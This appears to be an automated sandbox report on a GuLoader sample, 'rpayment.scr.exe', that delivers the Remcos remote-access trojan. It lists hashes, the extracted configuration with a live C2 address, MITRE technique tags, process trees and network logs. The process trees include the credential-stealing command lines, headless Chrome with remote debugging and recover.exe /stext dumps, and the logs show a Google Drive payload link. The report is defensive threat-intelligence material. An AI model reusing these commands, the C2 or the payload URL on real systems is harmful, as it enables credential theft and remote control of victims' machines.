guloader | 2f423571a318924318504db10008bc4cc48afd550c59caf89b40a04c94a890f7

Analysis

max time kernel
148s
max time network
136s
platform
windows7_x64
resource
win7-20241023-en
resource tags

arch:x64arch:x86image:win7-20241023-enlocale:en-usos:windows7-x64system
submitted
28/03/2025, 03:30 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

rpayment.scr.exe
Size

701KB
MD5

e7bbeae6c391accd957b6475dd5f0e63
SHA1

9460741f8eaff856a8163ad5a22c68dd24a0595e
SHA256

2f423571a318924318504db10008bc4cc48afd550c59caf89b40a04c94a890f7
SHA512

83feec2439997a2b9f7a2ae67966d7ab831d8eb9d8d8836746223b05c73e45e48cce3fc5d6ba420907e3c279ae2916d734b366829404786936cb93bc567f18d8
SSDEEP

12288:LR3BUIa3RVtFRe5L7lwvIuBUz3D46l0xFXc3gIwEL:V3GIQHY5vlI7Mnl0Pg73L

Score

10^/10

guloader remcos host-2 collection credential_access discovery downloader rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

Host-2

176.65.142.14:6060

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-HM3EZ8
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Guloader family
guloader
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Detected Nirsoft tools 4 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral1/memory/2816-80-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/580-84-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1712-78-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft
behavioral1/memory/1712-67-0x0000000000400000-0x000000000047D000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral1/memory/2816-80-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 2 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral1/memory/1712-78-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView
behavioral1/memory/1712-67-0x0000000000400000-0x000000000047D000-memory.dmp	WebBrowserPassView

Uses browser remote debugging 2 TTPs 1 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1332	Chrome.exe

Loads dropped DLL 2 IoCs

pid	Process
308	rpayment.scr.exe
308	rpayment.scr.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	recover.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	drive.google.com
5	drive.google.com

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2780	rpayment.scr.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
308	rpayment.scr.exe
2780	rpayment.scr.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2780 set thread context of 1712	2780	rpayment.scr.exe	37
PID 2780 set thread context of 2816	2780	rpayment.scr.exe	38
PID 2780 set thread context of 580	2780	rpayment.scr.exe	39

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Common Files\crepe\satanerne.ini	rpayment.scr.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\chrome_debug.log	Chrome.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rpayment.scr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rpayment.scr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	recover.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2780	rpayment.scr.exe
1520	Chrome.exe
1520	Chrome.exe
1520	Chrome.exe
1520	Chrome.exe
1712	recover.exe
1712	recover.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
308	rpayment.scr.exe
2780	rpayment.scr.exe
2780	rpayment.scr.exe
2780	rpayment.scr.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1520	Chrome.exe
Token: SeDebugPrivilege	580	recover.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2780	rpayment.scr.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
2780	rpayment.scr.exe

Suspicious use of WriteProcessMemory 26 IoCs

description	pid	Process	procid_target
PID 308 wrote to memory of 2780	308	rpayment.scr.exe	30
PID 308 wrote to memory of 2780	308	rpayment.scr.exe	30
PID 308 wrote to memory of 2780	308	rpayment.scr.exe	30
PID 308 wrote to memory of 2780	308	rpayment.scr.exe	30
PID 308 wrote to memory of 2780	308	rpayment.scr.exe	30
PID 1332 wrote to memory of 1520	1332	Chrome.exe	35
PID 1332 wrote to memory of 1520	1332	Chrome.exe	35
PID 1332 wrote to memory of 1520	1332	Chrome.exe	35
PID 1332 wrote to memory of 2544	1332	Chrome.exe	36
PID 1332 wrote to memory of 2544	1332	Chrome.exe	36
PID 1332 wrote to memory of 2544	1332	Chrome.exe	36
PID 2780 wrote to memory of 1712	2780	rpayment.scr.exe	37
PID 2780 wrote to memory of 1712	2780	rpayment.scr.exe	37
PID 2780 wrote to memory of 1712	2780	rpayment.scr.exe	37
PID 2780 wrote to memory of 1712	2780	rpayment.scr.exe	37
PID 2780 wrote to memory of 1712	2780	rpayment.scr.exe	37
PID 2780 wrote to memory of 2816	2780	rpayment.scr.exe	38
PID 2780 wrote to memory of 2816	2780	rpayment.scr.exe	38
PID 2780 wrote to memory of 2816	2780	rpayment.scr.exe	38
PID 2780 wrote to memory of 2816	2780	rpayment.scr.exe	38
PID 2780 wrote to memory of 2816	2780	rpayment.scr.exe	38
PID 2780 wrote to memory of 580	2780	rpayment.scr.exe	39
PID 2780 wrote to memory of 580	2780	rpayment.scr.exe	39
PID 2780 wrote to memory of 580	2780	rpayment.scr.exe	39
PID 2780 wrote to memory of 580	2780	rpayment.scr.exe	39
PID 2780 wrote to memory of 580	2780	rpayment.scr.exe	39

C:\Users\Admin\AppData\Local\Temp\rpayment.scr.exe
"C:\Users\Admin\AppData\Local\Temp\rpayment.scr.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:308
- C:\Users\Admin\AppData\Local\Temp\rpayment.scr.exe
  "C:\Users\Admin\AppData\Local\Temp\rpayment.scr.exe"
  2⤵
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2780
- - C:\Program Files\Google\Chrome\Application\Chrome.exe
    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --headless --remote-debugging-port=9222 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:1332
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7fef6429758,0x7fef6429768,0x7fef6429778
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1520
  - - C:\Program Files\Google\Chrome\Application\Chrome.exe
      "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1148 --field-trial-handle=1016,i,1795480744902545178,16705743817957832347,131072 --disable-features=PaintHolding /prefetch:8
      4⤵
      PID:2544
- - C:\Windows\SysWOW64\recover.exe
    C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\ybwfazcdncdywatdimovkgf"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1712
- - C:\Windows\SysWOW64\recover.exe
    C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\jvbxbsnxbkwdgohhrwaxvtrqcc"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:2816
- - C:\Windows\SysWOW64\recover.exe
    C:\Windows\SysWOW64\recover.exe /stext "C:\Users\Admin\AppData\Local\Temp\lyoqtcxypsoqiudlihnyygmhlqmol"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:580

Network

DNS

drive.google.com

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A

Response

drive.google.com

IN A

172.217.16.238
DNS

drive.google.com

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

drive.google.com

IN A
GET

https://drive.google.com/uc?export=download&id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y

rpayment.scr.exe

Remote address:

172.217.16.238:443

Request

GET /uc?export=download&id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Host: drive.google.com
Cache-Control: no-cache

Response

HTTP/1.1 303 See Other

Content-Type: application/binary
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Fri, 28 Mar 2025 03:30:35 GMT
Location: https://drive.usercontent.google.com/download?id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y&export=download
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: script-src 'nonce-eVxZgJRz2wn9dIStYL_lHw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
Cross-Origin-Opener-Policy: same-origin
Server: ESF
Content-Length: 0
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

c.pki.goog

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.179.227
GET

http://c.pki.goog/r/r1.crl

rpayment.scr.exe

Remote address:

142.250.179.227:80

Request

GET /r/r1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 854
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Fri, 28 Mar 2025 03:02:08 GMT
Expires: Fri, 28 Mar 2025 03:52:08 GMT
Cache-Control: public, max-age=3000
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
Age: 1707
DNS

o.pki.goog

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

o.pki.goog

IN A

Response

o.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.179.227
GET

http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDx560%2FLqy01BCQNkH7kIyt

rpayment.scr.exe

Remote address:

142.250.179.227:80

Request

GET /wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDx560%2FLqy01BCQNkH7kIyt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Fri, 28 Mar 2025 02:52:17 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 2298
GET

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEAtphStRphWCCu97iO6vuXk%3D

rpayment.scr.exe

Remote address:

142.250.179.227:80

Request

GET /wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEAtphStRphWCCu97iO6vuXk%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: o.pki.goog

Response

HTTP/1.1 200 OK

Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Date: Fri, 28 Mar 2025 02:37:47 GMT
Cache-Control: public, max-age=14400
Content-Type: application/ocsp-response
Age: 3169
DNS

drive.usercontent.google.com

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

drive.usercontent.google.com

IN A

Response

drive.usercontent.google.com

IN A

142.250.180.1
GET

https://drive.usercontent.google.com/download?id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y&export=download

rpayment.scr.exe

Remote address:

142.250.180.1:443

Request

GET /download?id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y&export=download HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: Keep-Alive
Cache-Control: no-cache
Host: drive.usercontent.google.com

Response

HTTP/1.1 200 OK

X-GUploader-UploadID: AKDAyIv_sn-ssoSAKDBcbOu_KU-IE777SIwHyQnz2LQQNsTclwb6ZpiYtfa992pqI67gzA3i
Content-Type: application/octet-stream
Content-Security-Policy: sandbox
Content-Security-Policy: default-src 'none'
Content-Security-Policy: frame-ancestors 'none'
X-Content-Security-Policy: sandbox
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Resource-Policy: same-site
X-Content-Type-Options: nosniff
Content-Disposition: attachment; filename="uHLUnXmjfyIlwDwXtFc113.bin"
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: false
Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, X-Google-EOM, x-goog-ext-124712974-jspb, x-goog-ext-467253834-jspb, x-goog-ext-353267353-bin, x-goog-ext-353267353-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, x-goog-ext-477772811-jspb, x-goog-ext-359275022-bin, x-goog-ext-328800237-jspb, x-goog-ext-202735639-bin, x-goog-ext-223435598-bin, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Request-Time, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, x-goog-maps-api-salt, x-goog-maps-api-signature, x-goog-maps-client-id, X-Goog-Api-Key, x-goog-spanner-database-role, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Places-Ios-Sdk, X-Android-Package, X-Android-Cert, X-Places-Android-Sdk, X-Goog-Maps-Ios-Uuid, X-Goog-Maps-Android-Uuid, X-Ariane-Xsrf-Token, X-YouTube-Bootstrap-Logged-In, X-Youtube-Client-Version, X-Youtube-Lava-Device-Context, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Label, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-Bot-Info, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-Interop-Cohorts, X-Goog-Meeting-Interop-Type, X-Goog-Meeting-OidcIdToken, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-Viewer-Token, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment, x-goog-greenenergyuserappservice-metadata, x-goog-sherlog-context, X-Server-Token, x-rfui-request-context, x-goog-nest-jwt, X-Cloud-Trace-Context, traceparent, x-goog-chat-space-id, x-goog-pan-request-context, X-AppInt-Credentials
Access-Control-Allow-Methods: GET,HEAD,OPTIONS
Accept-Ranges: bytes
Content-Length: 498752
Last-Modified: Fri, 28 Mar 2025 00:04:31 GMT
Date: Fri, 28 Mar 2025 03:30:39 GMT
Expires: Fri, 28 Mar 2025 03:30:39 GMT
Cache-Control: private, max-age=0
X-Goog-Hash: crc32c=WiBzVw==
Server: UploadServer
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
DNS

geoplugin.net

rpayment.scr.exe

Remote address:

8.8.8.8:53

Request

geoplugin.net

IN A

Response

geoplugin.net

IN A

178.237.33.50
GET

http://geoplugin.net/json.gp

rpayment.scr.exe

Remote address:

178.237.33.50:80

Request

GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

date: Fri, 28 Mar 2025 03:30:43 GMT
server: Apache
content-length: 954
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
DNS

www.microsoft.com

Remote address:

8.8.8.8:53

Request

www.microsoft.com

IN A

Response

www.microsoft.com

IN CNAME

www.microsoft.com-c-3.edgekey.net

www.microsoft.com-c-3.edgekey.net

IN CNAME

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net

IN CNAME

e13678.dscb.akamaiedge.net

e13678.dscb.akamaiedge.net

IN A

23.192.18.101
GET

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

Remote address:

23.192.18.101:80

Request

GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 1078
Content-Type: application/octet-stream
Content-MD5: HqJzZuA065RHozzmOcAUiQ==
Last-Modified: Tue, 14 Jan 2025 20:41:31 GMT
ETag: 0x8DD34DBD43549F4
x-ms-request-id: 90d94cda-601e-004e-55c9-667962000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Fri, 28 Mar 2025 03:31:06 GMT
Connection: keep-alive
TLS_version: UNKNOWN
ms-cv: CASMicrosoftCV2b304c38.0
ms-cv-esi: CASMicrosoftCV2b304c38.0
X-RTag: RT
DNS

crl.microsoft.com

Remote address:

8.8.8.8:53

Request

crl.microsoft.com

IN A

Response

crl.microsoft.com

IN CNAME

crl.www.ms.akadns.net

crl.www.ms.akadns.net

IN CNAME

a1363.dscg.akamai.net

a1363.dscg.akamai.net

IN A

2.19.252.157

a1363.dscg.akamai.net

IN A

2.19.252.143
GET

http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

Remote address:

2.19.252.157:80

Request

GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 26 Sep 2024 02:21:11 GMT
User-Agent: Microsoft-CryptoAPI/6.1
Host: crl.microsoft.com

Response

HTTP/1.1 200 OK

Content-Length: 825
Content-Type: application/octet-stream
Content-MD5: O14L1mQEVqdJ2RVebBNXJw==
Last-Modified: Wed, 26 Feb 2025 21:48:51 GMT
ETag: 0x8DD56AF5BD2A499
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 42091eff-701e-0052-4a9a-882b02000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Date: Fri, 28 Mar 2025 03:31:06 GMT
Connection: keep-alive

172.217.16.238:443

https://drive.google.com/uc?export=download&id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y

tls, http

rpayment.scr.exe

1.4kB
8.7kB
13
12

HTTP Request

GET https://drive.google.com/uc?export=download&id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y

HTTP Response

303
142.250.179.227:80

http://c.pki.goog/r/r1.crl

http

rpayment.scr.exe

348 B
1.7kB
5
4

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

200
142.250.179.227:80

http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEAtphStRphWCCu97iO6vuXk%3D

http

rpayment.scr.exe

836 B
2.4kB
8
5

HTTP Request

GET http://o.pki.goog/wr2/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEQDx560%2FLqy01BCQNkH7kIyt

HTTP Response

200

HTTP Request

GET http://o.pki.goog/wr2/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRTQtSEi8EX%2BbYUTXd8%2ByMxD3s1zQQU3hse7XkV1D43JMMhu%2Bw0OW1CsjACEAtphStRphWCCu97iO6vuXk%3D

HTTP Response

200
142.250.180.1:443

https://drive.usercontent.google.com/download?id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y&export=download

tls, http

rpayment.scr.exe

11.1kB
534.8kB
223
389

HTTP Request

GET https://drive.usercontent.google.com/download?id=18tpMXWMaHqKIsoy08Gq3a7rKUblJL8-y&export=download

HTTP Response

200
176.65.142.14:6060

tls

rpayment.scr.exe

3.8kB
1.9kB
15
17
176.65.142.14:6060

tls

rpayment.scr.exe

34.5kB
722.1kB
300
538
176.65.142.14:6060

tls

rpayment.scr.exe

104.1kB
84.4kB
118
94
176.65.142.14:6060

tls

rpayment.scr.exe

976 B
864 B
7
5
178.237.33.50:80

http://geoplugin.net/json.gp

http

rpayment.scr.exe

675 B
2.5kB
13
4

HTTP Request

GET http://geoplugin.net/json.gp

HTTP Response

200
127.0.0.1:9222

rpayment.scr.exe
23.192.18.101:80

http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

http

393 B
1.7kB
4
4

HTTP Request

GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

HTTP Response

200
2.19.252.157:80

http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

http

457 B
2.8kB
5
5

HTTP Request

GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

HTTP Response

200

8.8.8.8:53

drive.google.com

dns

rpayment.scr.exe

124 B
78 B
2
1

DNS Request

drive.google.com

DNS Request

drive.google.com

DNS Response

172.217.16.238
8.8.8.8:53

c.pki.goog

dns

rpayment.scr.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.179.227
8.8.8.8:53

o.pki.goog

dns

rpayment.scr.exe

56 B
107 B
1
1

DNS Request

o.pki.goog

DNS Response

142.250.179.227
8.8.8.8:53

drive.usercontent.google.com

dns

rpayment.scr.exe

74 B
90 B
1
1

DNS Request

drive.usercontent.google.com

DNS Response

142.250.180.1
8.8.8.8:53

geoplugin.net

dns

rpayment.scr.exe

59 B
75 B
1
1

DNS Request

geoplugin.net

DNS Response

178.237.33.50
8.8.8.8:53

www.microsoft.com

dns

63 B
230 B
1
1

DNS Request

www.microsoft.com

DNS Response

23.192.18.101
8.8.8.8:53

crl.microsoft.com

dns

63 B
162 B
1
1

DNS Request

crl.microsoft.com

DNS Response

2.19.252.157

2.19.252.143

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

